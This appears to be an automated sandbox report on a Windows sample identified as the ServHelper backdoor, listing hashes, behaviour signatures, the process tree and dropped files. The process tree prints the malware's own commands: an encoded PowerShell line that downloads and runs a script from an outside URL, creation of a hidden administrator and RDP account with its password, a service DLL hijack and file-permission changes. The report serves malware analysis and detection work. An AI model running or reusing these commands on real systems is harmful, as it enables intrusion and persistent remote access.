Analysis
-
max time kernel
144s -
max time network
64s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
10-10-2021 20:55
Static task
static1
Behavioral task
behavioral1
Sample
5t6yujh.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
5t6yujh.exe
Resource
win10v20210408
General
-
Target
5t6yujh.exe
-
Size
5.7MB
-
MD5
211ca7c8d5fd20f7dcaebdbe354662be
-
SHA1
1111e864f3e9d2e6879c5179c4136638b05b67c9
-
SHA256
aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
-
SHA512
d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 10 1844 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid Process 1784 icacls.exe 1160 icacls.exe 1844 icacls.exe 1600 icacls.exe 620 takeown.exe 1328 icacls.exe 1732 icacls.exe 580 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule behavioral1/files/0x00040000000130d9-167.dat upx behavioral1/files/0x00050000000130da-168.dat upx -
Loads dropped DLL 2 IoCs
Processes:
pid Process 1060 1060 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid Process 1328 icacls.exe 1732 icacls.exe 580 icacls.exe 1784 icacls.exe 1160 icacls.exe 1844 icacls.exe 1600 icacls.exe 620 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3eb8d2cc-9ede-4dc9-b60e-57f741824474 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a53f6d04-8413-43aa-8c03-242ad3c66866 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cff7075f-747e-4b37-85e6-6950a3eae12c powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9B5DZS2M3BQR2H1C20MI.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e8d30324-2e43-4b84-ac95-a8a3597e4a80 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aa74722b-01c9-469b-97f7-955d7260f881 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ded16fa5-e93d-4f17-b571-d93c31a0830e powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f64a93c8-8f21-48c2-a397-10504fc7657f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef394e1a-e502-40b7-a4db-d35cc01ea761 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6af89d76-631a-41e0-80c9-c8920c7fe6ab powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22233898-edef-45ee-a7eb-fb89511f4336 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7ad5de90-20cb-46bf-923a-804b90a9aabc powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c02897ff29bed701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 1724 powershell.exe 1724 powershell.exe 1116 powershell.exe 1116 powershell.exe 776 powershell.exe 776 powershell.exe 1724 powershell.exe 1724 powershell.exe 1724 powershell.exe 1844 powershell.exe 1844 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid Process 460 1060 1060 1060 1060 -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
powershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1724 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeRestorePrivilege 1732 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1712 WMIC.exe Token: SeIncreaseQuotaPrivilege 1712 WMIC.exe Token: SeAuditPrivilege 1712 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1712 WMIC.exe Token: SeIncreaseQuotaPrivilege 1712 WMIC.exe Token: SeAuditPrivilege 1712 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1816 WMIC.exe Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeAuditPrivilege 1816 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1816 WMIC.exe Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeAuditPrivilege 1816 WMIC.exe Token: SeDebugPrivilege 1844 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5t6yujh.exepowershell.execsc.exenet.execmd.execmd.exedescription pid Process procid_target PID 1996 wrote to memory of 1724 1996 5t6yujh.exe 26 PID 1996 wrote to memory of 1724 1996 5t6yujh.exe 26 PID 1996 wrote to memory of 1724 1996 5t6yujh.exe 26 PID 1724 wrote to memory of 1728 1724 powershell.exe 28 PID 1724 wrote to memory of 1728 1724 powershell.exe 28 PID 1724 wrote to memory of 1728 1724 powershell.exe 28 PID 1728 wrote to memory of 600 1728 csc.exe 29 PID 1728 wrote to memory of 600 1728 csc.exe 29 PID 1728 wrote to memory of 600 1728 csc.exe 29 PID 1724 wrote to memory of 1116 1724 powershell.exe 30 PID 1724 wrote to memory of 1116 1724 powershell.exe 30 PID 1724 wrote to memory of 1116 1724 powershell.exe 30 PID 1724 wrote to memory of 1080 1724 powershell.exe 32 PID 1724 wrote to memory of 1080 1724 powershell.exe 32 PID 1724 wrote to memory of 1080 1724 powershell.exe 32 PID 1724 wrote to memory of 776 1724 powershell.exe 34 PID 1724 wrote to memory of 776 1724 powershell.exe 34 PID 1724 wrote to memory of 776 1724 powershell.exe 34 PID 1724 wrote to memory of 620 1724 powershell.exe 38 PID 1724 wrote to memory of 620 1724 powershell.exe 38 PID 1724 wrote to memory of 620 1724 powershell.exe 38 PID 1724 wrote to memory of 1328 1724 powershell.exe 39 PID 1724 wrote to memory of 1328 1724 powershell.exe 39 PID 1724 wrote to memory of 1328 1724 powershell.exe 39 PID 1724 wrote to memory of 1732 1724 powershell.exe 40 PID 1724 wrote to memory of 1732 1724 powershell.exe 40 PID 1724 wrote to memory of 1732 1724 powershell.exe 40 PID 1724 wrote to memory of 580 1724 powershell.exe 41 PID 1724 wrote to memory of 580 1724 powershell.exe 41 PID 1724 wrote to memory of 580 1724 powershell.exe 41 PID 1724 wrote to memory of 1784 1724 powershell.exe 42 PID 1724 wrote to memory of 1784 1724 powershell.exe 42 PID 1724 wrote to memory of 1784 1724 powershell.exe 42 PID 1724 wrote to memory of 1160 1724 powershell.exe 43 PID 1724 wrote to memory of 1160 1724 powershell.exe 43 PID 1724 wrote to memory of 1160 1724 powershell.exe 43 PID 1724 wrote to memory of 1844 1724 powershell.exe 44 PID 1724 wrote to memory of 1844 1724 powershell.exe 44 PID 1724 wrote to memory of 1844 1724 powershell.exe 44 PID 1724 wrote to memory of 1600 1724 powershell.exe 45 PID 1724 wrote to memory of 1600 1724 powershell.exe 45 PID 1724 wrote to memory of 1600 1724 powershell.exe 45 PID 1724 wrote to memory of 1992 1724 powershell.exe 46 PID 1724 wrote to memory of 1992 1724 powershell.exe 46 PID 1724 wrote to memory of 1992 1724 powershell.exe 46 PID 1724 wrote to memory of 1440 1724 powershell.exe 47 PID 1724 wrote to memory of 1440 1724 powershell.exe 47 PID 1724 wrote to memory of 1440 1724 powershell.exe 47 PID 1724 wrote to memory of 1200 1724 powershell.exe 48 PID 1724 wrote to memory of 1200 1724 powershell.exe 48 PID 1724 wrote to memory of 1200 1724 powershell.exe 48 PID 1724 wrote to memory of 1116 1724 powershell.exe 49 PID 1724 wrote to memory of 1116 1724 powershell.exe 49 PID 1724 wrote to memory of 1116 1724 powershell.exe 49 PID 1116 wrote to memory of 1792 1116 net.exe 50 PID 1116 wrote to memory of 1792 1116 net.exe 50 PID 1116 wrote to memory of 1792 1116 net.exe 50 PID 1724 wrote to memory of 324 1724 powershell.exe 51 PID 1724 wrote to memory of 324 1724 powershell.exe 51 PID 1724 wrote to memory of 324 1724 powershell.exe 51 PID 324 wrote to memory of 1812 324 cmd.exe 52 PID 324 wrote to memory of 1812 324 cmd.exe 52 PID 324 wrote to memory of 1812 324 cmd.exe 52 PID 1812 wrote to memory of 1068 1812 cmd.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe"C:\Users\Admin\AppData\Local\Temp\5t6yujh.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2bmya4d3\2bmya4d3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC5B.tmp" "c:\Users\Admin\AppData\Local\Temp\2bmya4d3\CSC78F7F96AED0E42A3BD16D3E9B0B539F5.TMP"4⤵PID:600
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵PID:1080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:620
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1328
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:580
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1784
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1160
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1844
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1600
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1992
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1440
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1200
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1792
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1680
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:944
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1656
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:756
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1608
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1472
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:620
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:556
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc CZBb3gcd /add1⤵PID:1832
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc CZBb3gcd /add2⤵PID:1368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc CZBb3gcd /add3⤵PID:1592
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1736
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1008
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:1816
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1792
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:844
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc CZBb3gcd1⤵PID:556
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc CZBb3gcd2⤵PID:1628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc CZBb3gcd3⤵PID:1368
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:796
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1648
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1760
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0d40d804-d36c-4cd4-a1e1-65933baa5b17
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2623399d-32bf-472e-a790-0ed8e55af5d6
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38c63c50-dd72-427e-a28c-5d7973980935
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4f5c4eda-2e25-4824-a312-f2ad7aa7186e
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_94f60c64-abda-45ff-8f70-627fd6bc8b42
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a7d10d0f-a3e4-4715-9198-6df655be9fc7
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c382fc1d-42ac-471a-b049-747bfe31579d
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5b0d7cbc57ffd4be135b599ad16e3e62f
SHA1af36496b915856d92b094e662139e1fb2d8740cf
SHA256f11c259eb4bad8855eeb4b081fb043dbcff0166263ee1e46c2959f631bb6ca3a
SHA5129be17df550f7ae6515c986e18fa6c31b85d39be202168ae2e4428593b78e00eeb391a968e6b77dfc1118129c544c9f944da1c7443c66554cb8a69c254bae9dee
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5bba23d8a28e9be0defecfeac33e25a0f
SHA165f1239d130c7f922dbebd3898dcc077dc2e4518
SHA256edd09aae51a146d97dfccbb044c5adf10d10da4aa6caca78f8e0ada0f9204f8b
SHA512e7ffc7fd7c3b473a2c1dcb29bd7aa9e1f785fc4c64a786a045ba966e5c4d77b42521844c356b3f0e88b8bcaea91c129f23331be857bc4ae2f8549ffe75a95e4b
-
MD5
e4a09fea35f35654873e6d8b1fdf2f16
SHA141d35dc85911148cc99aa195f6a87570588d72e5
SHA2561b024d7a86e0d994b7144607ae736b29e84e9ca55d27e4472e2808cd95f09418
SHA512fbb377e1a29a611eba141eec798bde5b37bdfe3c73ccf81aeb5ac5e2096829086a1aafff5165a9404e0aa8050e92dde0efee3b8dedac705cb105be40f57e2b32
-
MD5
e38f8e0190420b54005044e67e41e6cc
SHA1142f56dc5b2e39fa9e10a27cc6f0bbca28a2a29b
SHA256314e1487d705b12b5ae10852d742b8703ede04aa2ab20deed8d87fa6a8893422
SHA512ee79590998e4a6a3d53255a6d78f3e5ce7d7d660e85d528312b374cdd7e419a2c9a3aa600fe9e7cc7ff4cb3cdb68b333539535cd8cb900e5435d2755fd504f43
-
MD5
a9176019ae2f0af22af200ca4f842b59
SHA122c13657a4210aca116ab63d2f806906dda954fd
SHA256af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739
SHA5125171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5301947ae77858954943a91097a715e81
SHA1edef9f9fca78e3c370026ae9caccaf182ba51934
SHA2564d365010dc1756d2cb60e07ae04975837c762c4f871c9897ec5eccaceb83b060
SHA512defa3ad18d6a2e528dd2a0887fa47e6727ca8a36d13b77cda3cbcf72c60996f49ba6b35577a1813505eb5786efdecc7e360aa73a70408858161c602a06c5e095
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
